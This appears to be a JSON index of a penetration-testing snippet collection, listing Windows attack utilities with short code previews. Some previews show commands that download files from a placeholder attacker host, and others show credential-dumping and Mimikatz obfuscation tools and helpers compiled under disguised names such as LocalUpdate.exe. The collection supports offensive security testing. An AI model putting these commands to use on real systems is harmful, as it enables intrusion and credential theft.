    "path": "snippets/windows/utils/SuperPing.ps1",
    "chars": 1435,
    "preview": "# Author: Merakel\n\n$ping =\n    \"server1\",\n    \"server2\",\n    \"server3\"\n\nFunction Super-Ping{\n    Param([Parameter(ValueF"
  },
  {
    "path": "snippets/windows/utils/Win10FirewallRules.ps1",
    "chars": 626,
    "preview": "Get-NetFirewallRule -Action Allow -Enabled True -Direction Inbound |\nFormat-Table -Property @{Name='DisplayName'; Expres"
  },
  {
    "path": "snippets/windows/utils/WindowsEnum.ps1",
    "chars": 7198,
    "preview": "# Source https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1\r\n# Usage\r\n# run script directly "
  },
  {
    "path": "snippets/windows/utils/base64.vbs",
    "chars": 989,
    "preview": "Function Base64Encode(inData)\n  Const Base64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n  Dim "
  },
  {
    "path": "snippets/windows/utils/ftp.bat",
    "chars": 186,
    "preview": "REM ftp -v -n -s:ftp.txt\r\n\r\necho open VAR_ATTACKER_HOST > ftp.txt\r\necho user anonymous >> ftp.txt\r\necho ftp >> ftp.txt\r\n"
  },
  {
    "path": "snippets/windows/utils/icacls.bat",
    "chars": 749,
    "preview": "@echo off\nREM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/icacls.bat\nREM Description: Scri"
  },
  {
    "path": "snippets/windows/utils/info.aspx",
    "chars": 44280,
    "preview": "<%--\n    Source: https://gist.githubusercontent.com/mrichman/fc097266e57ba64c43d24ad3bdf6d5e8/raw/ad40dffa08111d8cb5ecef"
  },
  {
    "path": "snippets/windows/utils/mimikatz-Invoke-Mimikatz-obfuscate.sh",
    "chars": 951,
    "preview": "#!/bin/bash\n\n# Original: https://gist.githubusercontent.com/infosecn1nja/bb0771adb879f1690a0dd8dfa0fc728b/raw/70d45ad3ac"
  },
  {
    "path": "snippets/windows/utils/mimikatz-clone-obfuscated.sh",
    "chars": 1827,
    "preview": "#!/bin/bash\n\n# Original: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/\n\nif [[ -z $1 ]]; then\n    e"
  },
  {
    "path": "snippets/windows/utils/minidump.cs",
    "chars": 1128,
    "preview": "using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices; using System.IO;\n\nnamespace MiniDump {\n\n  "
  },
  {
    "path": "snippets/windows/utils/run_bat.c",
    "chars": 159,
    "preview": "// x86_64-w64-mingw32-gcc run_bat.c -o mssvc.exe\n\n#include <stdlib.h>\n\nint main ()\n{\n    int i;\n    i = system(\"cmd /c C"
  },
  {
    "path": "snippets/windows/utils/run_dll1.c",
    "chars": 323,
    "preview": "// Minimalistic approach\n// x86_64-w64-mingw32-gcc run_dll1.c -o lib.dll -shared\n\n#include <windows.h>\n\nBOOL WINAPI DllM"
  },
  {
    "path": "snippets/windows/utils/run_dll2.cpp",
    "chars": 1449,
    "preview": "// x86_64-w64-mingw32-g++ run_dll2.cpp -o lib.dll -shared\r\n// get.bat: %COMSPEC% /c whoami > C:\\Python27\\whoami.txt\r\n\r\n#"
  },
  {
    "path": "snippets/windows/utils/runas1.bat",
    "chars": 369,
    "preview": "REM powershell -ExecutionPolicy Bypass -File runas.ps1\n\necho $username = 'VAR_USERNAME' > runas.ps1\necho $securePassword"
  },
  {
    "path": "snippets/windows/utils/runas2.bat",
    "chars": 406,
    "preview": "REM powershell -ExecutionPolicy Bypass -File script.ps1\r\n\r\necho $pp = new-object -typename System.Management.Automation."
  },
  {
    "path": "snippets/windows/utils/schcheck.bat",
    "chars": 548,
    "preview": "@echo off\nREM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/schcheck.bat\nREM - Lists all sch"
  },
  {
    "path": "snippets/windows/utils/tcpwrecovery.py",
    "chars": 3604,
    "preview": "\"\"\"\nCopyright (C) <2013> <Csaba Fitzl>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of "
  },
  {
    "path": "snippets/windows/utils/update_invoke_mimikatz.py",
    "chars": 1006,
    "preview": "#!/usr/bin/python3\n\n# Source: https://raw.githubusercontent.com/gg-sec/update_invoke_mimikatz/30c459843e1cc7b4b218317f92"
  },
  {
    "path": "snippets/windows/utils/useradd.c",
    "chars": 227,
    "preview": "// x86_64-w64-mingw32-gcc useradd.c -o LocalUpdate.exe\n\n#include <stdlib.h>\n\nint main ()\n{\n    int i;\n    i = system(\"ne"
  },
  {
    "path": "snippets/windows/utils/wget_ps1.bat",
    "chars": 345,
    "preview": "REM powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1\r\n\r\necho $storageDir = $pwd "
  },
  {
    "path": "snippets/windows/utils/wget_vbs.bat",
    "chars": 1418,
    "preview": "REM cscript wget.vbs http://VAR_ATTACKER_HOST/file.exe file.exe\n\necho strUrl = WScript.Arguments.Item(0) > wget.vbs\necho"
  },
  {
    "path": "snippets/windows/utils/winscppassword.py",
    "chars": 3575,
    "preview": "# coding=utf-8\n\n# Source: https://github.com/dzxs/winscppassword\n\ntry:\n    import _winreg\nexcept:\n    import winreg as _"
  },
  {
    "path": "snippets/xml/xee.txt",
    "chars": 3234,
    "preview": "-- Source: https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67d"
  }
]
